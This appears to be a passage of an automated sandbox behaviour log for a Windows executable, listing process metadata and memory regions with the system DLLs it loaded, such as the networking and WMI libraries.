# Flog Txt Version 1 # Analyzer Version: 4.1.1 # Analyzer Build Date: Feb 8 2021 16:19:57 # Log Creation Date: 18.04.2021 17:44:09.943 Process: id = "1" image_name = "cusersgrujadesktopca5751036a12d0.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\cusersgrujadesktopca5751036a12d0.exe" page_root = "0x1ebc5000" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x838" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\CUsersGrujaDesktopca5751036a12d0.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001d5b8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9 start_va = 0x8d0000 end_va = 0x8e4fff monitored = 1 entry_point = 0x8d9940 region_type = mapped_file name = "cusersgrujadesktopca5751036a12d0.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\CUsersGrujaDesktopca5751036a12d0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cusersgrujadesktopca5751036a12d0.exe") Region: id = 10 start_va = 0x777c0000 end_va = 0x7793afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13 start_va = 0x7fff0000 end_va = 0x7ff84634ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 14 start_va = 0x7ff846350000 end_va = 0x7ff846510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15 start_va = 0x7ff846511000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff846511000" filename = "" Region: id = 211 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 212 start_va = 0x77000000 end_va = 0x77079fff monitored = 0 entry_point = 0x77013290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 213 start_va = 0x77080000 end_va = 0x770cffff monitored = 0 entry_point = 0x77098180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 214 start_va = 0x765d0000 end_va = 0x766affff monitored = 0 entry_point = 0x765e3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 215 start_va = 0x770d0000 end_va = 0x770d7fff monitored = 0 entry_point = 0x770d17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 216 start_va = 0x460000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 217 start_va = 0x765d0000 end_va = 0x766affff monitored = 0 entry_point = 0x765e3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 218 start_va = 0x76750000 end_va = 0x768cdfff monitored = 0 entry_point = 0x76801b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 219 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 220 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 221 start_va = 0x460000 end_va = 0x51dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 222 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 223 start_va = 0x74360000 end_va = 0x743f1fff monitored = 0 entry_point = 0x743a0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 224 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 225 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 226 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 227 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 228 start_va = 0x74430000 end_va = 0x74474fff monitored = 0 entry_point = 0x7444de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 229 start_va = 0x6cb20000 end_va = 0x6cb29fff monitored = 0 entry_point = 0x6cb23200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 230 start_va = 0x71490000 end_va = 0x7169cfff monitored = 0 entry_point = 0x7157acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 231 start_va = 0x74400000 end_va = 0x74409fff monitored = 0 entry_point = 0x74402a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 232 start_va = 0x74410000 end_va = 0x7442dfff monitored = 0 entry_point = 0x7441b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 233 start_va = 0x74480000 end_va = 0x7452cfff monitored = 0 entry_point = 0x74494f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 234 start_va = 0x74530000 end_va = 0x746ecfff monitored = 0 entry_point = 0x74612a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 235 start_va = 0x74840000 end_va = 0x748fdfff monitored = 0 entry_point = 0x74875630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 236 start_va = 0x75180000 end_va = 0x751c3fff monitored = 0 entry_point = 0x75199d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 237 start_va = 0x76a20000 end_va = 0x76a77fff monitored = 0 entry_point = 0x76a625c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 238 start_va = 0x74a40000 end_va = 0x74b8efff monitored = 0 entry_point = 0x74af6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 239 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 240 start_va = 0x74910000 end_va = 0x7498afff monitored = 0 entry_point = 0x7492e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 241 start_va = 0x6c9f0000 end_va = 0x6ca05fff monitored = 0 entry_point = 0x6c9f21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 242 start_va = 0x751d0000 end_va = 0x765cefff monitored = 0 entry_point = 0x7538b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 243 start_va = 0x74750000 end_va = 0x74786fff monitored = 0 entry_point = 0x74753b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 244 start_va = 0x77220000 end_va = 0x77718fff monitored = 0 entry_point = 0x77427610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 245 start_va = 0x74900000 end_va = 0x7490bfff monitored = 0 entry_point = 0x74903930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 246 start_va = 0x74c10000 end_va = 0x74c9cfff monitored = 0 entry_point = 0x74c59b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 247 start_va = 0x74bc0000 end_va = 0x74c03fff monitored = 0 entry_point = 0x74bc7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 248 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 249 start_va = 0x76930000 end_va = 0x76a1afff monitored = 0 entry_point = 0x7696d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 250 start_va = 0x74790000 end_va = 0x74821fff monitored = 0 entry_point = 0x747c8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 251 start_va = 0x8f0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 252 start_va = 0x400000 end_va = 0x429fff monitored = 0 entry_point = 0x405680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 253 start_va = 0x8f0000 end_va = 0xa77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 254 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 255 start_va = 0x74b90000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b95680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 256 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 257 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 258 start_va = 0xad0000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 259 start_va = 0xc60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 260 start_va = 0x704c0000 end_va = 0x70534fff monitored = 0 entry_point = 0x704f9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 261 start_va = 0x2060000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 262 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 263 start_va = 0x74ff0000 end_va = 0x75073fff monitored = 0 entry_point = 0x75016220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 264 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 265 start_va = 0x6c930000 end_va = 0x6c9eefff monitored = 0 entry_point = 0x6c961e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 266 start_va = 0x6c8c0000 end_va = 0x6c926fff monitored = 0 entry_point = 0x6c8db610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 267 start_va = 0x77740000 end_va = 0x7779efff monitored = 0 entry_point = 0x77744af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 268 start_va = 0x740b0000 end_va = 0x740cafff monitored = 0 entry_point = 0x740b9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 269 start_va = 0x6ca50000 end_va = 0x6ca5cfff monitored = 0 entry_point = 0x6ca53520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 270 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 271 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 272 start_va = 0x5a0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 273 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 274 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 275 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 276 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 277 start_va = 0x6ca30000 end_va = 0x6ca40fff monitored = 0 entry_point = 0x6ca38fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 896 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 897 start_va = 0x840000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 898 start_va = 0x880000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 899 start_va = 0xa80000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 900 start_va = 0x2160000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 901 start_va = 0x21a0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 902 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 903 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 904 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 905 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 906 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 907 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 908 start_va = 0x2a00000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 909 start_va = 0x2a40000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 910 start_va = 0x2b40000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 911 start_va = 0x2b80000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 912 start_va = 0x430000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 913 start_va = 0x6ca10000 end_va = 0x6ca18fff monitored = 0 entry_point = 0x6ca11db0 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 914 start_va = 0x6c870000 end_va = 0x6c8b3fff monitored = 0 entry_point = 0x6c88aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 915 start_va = 0x6c850000 end_va = 0x6c861fff monitored = 0 entry_point = 0x6c853d40 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 916 start_va = 0x6c830000 end_va = 0x6c849fff monitored = 0 entry_point = 0x6c833270 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 917 start_va = 0x6efa0000 end_va = 0x6efaafff monitored = 0 entry_point = 0x6efa1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 918 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 919 start_va = 0x6c820000 end_va = 0x6c82ffff monitored = 0 entry_point = 0x6c8234d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 920 start_va = 0x6c810000 end_va = 0x6c81efff monitored = 0 entry_point = 0x6c813f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 921 start_va = 0x6c800000 end_va = 0x6c809fff monitored = 0 entry_point = 0x6c8028d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 922 start_va = 0x6c7f0000 end_va = 0x6c7fefff monitored = 0 entry_point = 0x6c7f20e0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 925 start_va = 0x2c80000 end_va = 0x2d5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 926 start_va = 0x2d60000 end_va = 0x3096fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 927 start_va = 0x30a0000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 928 start_va = 0x31a0000 end_va = 0x329ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 929 start_va = 0x32a0000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 932 start_va = 0x71f70000 end_va = 0x7223afff monitored = 0 entry_point = 0x721ac4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 933 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 934 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 935 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 936 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 937 start_va = 0x705f0000 end_va = 0x70601fff monitored = 0 entry_point = 0x705f4510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 938 start_va = 0x71e30000 end_va = 0x71e5efff monitored = 0 entry_point = 0x71e3bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 939 start_va = 0x70550000 end_va = 0x705eafff monitored = 0 entry_point = 0x7058f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 940 start_va = 0x34a0000 end_va = 0x34dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 941 start_va = 0x34e0000 end_va = 0x35dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 942 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 943 start_va = 0x71ef0000 end_va = 0x71f3efff monitored = 0 entry_point = 0x71efd850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 944 start_va = 0x70540000 end_va = 0x70547fff monitored = 0 entry_point = 0x70541fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 945 start_va = 0x77720000 end_va = 0x77726fff monitored = 0 entry_point = 0x77721e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 946 start_va = 0x71e60000 end_va = 0x71ee3fff monitored = 0 entry_point = 0x71e86530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 947 start_va = 0x35e0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 948 start_va = 0x3620000 end_va = 0x371ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 949 start_va = 0x21e0000 end_va = 0x21e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 950 start_va = 0x3720000 end_va = 0x3727fff monitored = 0 entry_point = 0x37219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 951 start_va = 0x3730000 end_va = 0x3730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 952 start_va = 0x3720000 end_va = 0x3727fff monitored = 0 entry_point = 0x37219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 953 start_va = 0x3730000 end_va = 0x3730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 954 start_va = 0x3720000 end_va = 0x3727fff monitored = 0 entry_point = 0x37219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 955 start_va = 0x3730000 end_va = 0x3730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: 